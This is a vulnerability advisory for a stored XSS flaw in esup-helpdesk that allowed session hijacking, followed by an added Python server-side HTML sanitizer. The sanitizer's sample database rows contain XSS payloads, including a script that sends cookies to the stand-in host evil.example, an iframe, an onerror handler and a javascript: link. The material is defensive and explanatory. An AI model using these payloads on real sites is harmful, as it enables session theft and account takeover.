Child pages
  • ESUP-2009-AVI-001 - esup-helpdesk vulnerability

Usage and distribution of this document

The security advisories of the ESUP-Portail consortium concern software distributed by the consortium. It is the responsibility of each recipient of this document not to distribute it to other people, for obvious security reasons.


esup-helpdesk vulnerability



First version: 2009 January 12th

Latest version: 2009 January 14th


University of Rennes 1




  • 2009 January 12th: vulnerability reported
  • 2009 January 13th: vulnerability confirmed (Pascal Aubry)
  • 2009 January 14th: release 3.16.0 published (Pascal Aubry)

Attached files



Session hijacking (identity theft) by stealing session identifiers through cross-site scripting (XSS) attacks.

Affected systems

  • esup-helpdesk distributions from 3.0.0 to 3.15.2


esup-helpdesk uses FCK Editor to enter ticket actions and to edit FAQs. The HTML entered this way is stored and later displayed as-is to every user who views the ticket history or the FAQ.


  • From 3.0.0 to 3.15.2: FCK Editor only filters the markup client-side, in the browser. By loading a page that uses FCK Editor with JavaScript disabled (so that the filter never runs), it is possible to submit malicious markup, for instance <script> or <iframe> tags, which is stored unfiltered in the database. The code is then executed in the browser of every user who views the affected ticket or FAQ.
  • From 3.14.5 to 3.15.2: because of a mistake in the upgrade of FCK Editor (from 1.7.26 to 1.8), it is possible to enter arbitrary code without even disabling JavaScript.

Such JavaScript can in particular steal the victim's session identifier, which allows the attacker to take over the session (identity theft).


Release 3.16.0:

  • removes the malicious tags entered by users before storing data in the database;
  • removes the malicious code that may already have been stored by previous releases.
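Why client-side filtering is not enough, and what the server-side fix looks like, as an added example that is not esup-helpdesk code: FCK Editor's filtering runs in the submitting user's own browser, so an attacker who disables JavaScript (or simply posts the form fields with any HTTP client) sends whatever markup they like, and the server stored it untouched. The fix has to be an allowlist sanitizer applied on the server before the data reaches the database, plus a pass over the rows already stored. The Python below (esup-helpdesk itself is written in Java; the tag allowlist, the function names and the sample rows are assumptions made for this demonstration) does both with only the standard library.

```python
"""Server-side allowlist HTML sanitizer for rich-text input (added example,
not esup-helpdesk code). Tag/attribute allowlist and sample rows are assumed."""
import html
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Markup a ticket action or FAQ entry legitimately needs (assumption).
ALLOWED_TAGS = {"p", "br", "b", "i", "u", "strong", "em", "ul", "ol", "li",
                "a", "pre", "code"}
VOID_TAGS = {"br"}
ALLOWED_ATTRS = {"a": {"href"}}                 # no style=, no on*= handlers anywhere
SAFE_SCHEMES = {"http", "https", "mailto", ""}  # "" = relative URL
RAW_TEXT_TAGS = {"script", "style"}             # dropped together with their content


def _safe_url(value):
    """Reject javascript:, data:, vbscript: and similar schemes in href values."""
    if value is None:
        return False
    # Browsers ignore embedded whitespace/control chars ("java\tscript:"),
    # so remove them before looking at the scheme.
    compact = "".join(ch for ch in value if ch.isprintable() and not ch.isspace())
    return urlsplit(compact).scheme.lower() in SAFE_SCHEMES


class AllowlistSanitizer(HTMLParser):
    """Re-emit only allowlisted tags/attributes; everything else becomes text or vanishes."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self.open_tags = []   # allowed tags currently open, to keep the output balanced
        self.skip_depth = 0   # > 0 while inside <script>/<style>

    def handle_starttag(self, tag, attrs):
        if tag in RAW_TEXT_TAGS:
            self.skip_depth += 1
            return
        if self.skip_depth or tag not in ALLOWED_TAGS:
            return            # <iframe>, <img>, <object>, ... vanish
        safe_attrs = []
        for name, value in attrs:
            if name not in ALLOWED_ATTRS.get(tag, set()):
                continue      # drops onerror=, onclick=, style=, ...
            if name == "href" and not _safe_url(value):
                continue
            safe_attrs.append(f' {name}="{html.escape(value or "")}"')
        self.out.append(f"<{tag}{''.join(safe_attrs)}>")
        if tag not in VOID_TAGS:
            self.open_tags.append(tag)

    def handle_endtag(self, tag):
        if tag in RAW_TEXT_TAGS:
            self.skip_depth = max(0, self.skip_depth - 1)
            return
        if self.skip_depth or tag not in self.open_tags:
            return
        while self.open_tags:  # also close anything still open inside it
            opened = self.open_tags.pop()
            self.out.append(f"</{opened}>")
            if opened == tag:
                break

    def handle_data(self, data):
        if not self.skip_depth:
            self.out.append(html.escape(data, quote=False))
    # comments, declarations, processing instructions: default no-op, i.e. dropped

    def close(self):
        super().close()
        while self.open_tags:
            self.out.append(f"</{self.open_tags.pop()}>")

    def result(self):
        return "".join(self.out)


def sanitize(fragment):
    """Sanitized HTML for one submitted ticket action / FAQ body; call before INSERT."""
    parser = AllowlistSanitizer()
    parser.feed(fragment)
    parser.close()
    return parser.result()


def clean_stored_rows(rows):
    """Re-sanitize already stored (id, html) rows, as the fix does for old data.
    Returns (cleaned_rows, ids_that_changed) so the cleanup can be audited."""
    cleaned, changed = [], []
    for row_id, body in rows:
        new_body = sanitize(body)
        if new_body != body:
            changed.append(row_id)
        cleaned.append((row_id, new_body))
    return cleaned, changed


# Constructed sample rows, as they could sit in the database after an attack.
SAMPLE_ROWS = [
    (1, "<p>Printer on floor 2 is <b>offline</b> again.</p>"),
    (2, '<p>See <a href="https://example.org/kb/42">KB 42</a></p>'),
    (3, "<p>thanks</p><script>new Image().src='http://evil.example/?c='+document.cookie</script>"),
    (4, '<iframe src="http://evil.example/"></iframe><p>hi</p>'),
    (5, '<img src=x onerror="alert(document.cookie)">'),
    (6, '<a href="javascript:alert(1)">click</a>'),
]

if __name__ == "__main__":
    for row_id, body in clean_stored_rows(SAMPLE_ROWS)[0]:
        print(row_id, repr(body))
```

Two points worth keeping in mind when adapting this. First, the allowlist is the point: a blacklist that only strips `<script>` leaves `<img onerror=...>`, `<iframe>` and `javascript:` links in place, which is exactly the class of payload rows 4 to 6 represent. Second, marking the session cookie HttpOnly (not something the advisory mentions, but standard practice) stops `document.cookie` from exposing the identifier and so limits the session-theft consequence, yet it does nothing against the XSS itself; it is defense in depth, not a substitute for the sanitizer.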

Even though attacks can be traced after the fact (all actions are logged by the application), it is strongly recommended to upgrade to release 3.16.0 or later as soon as possible.

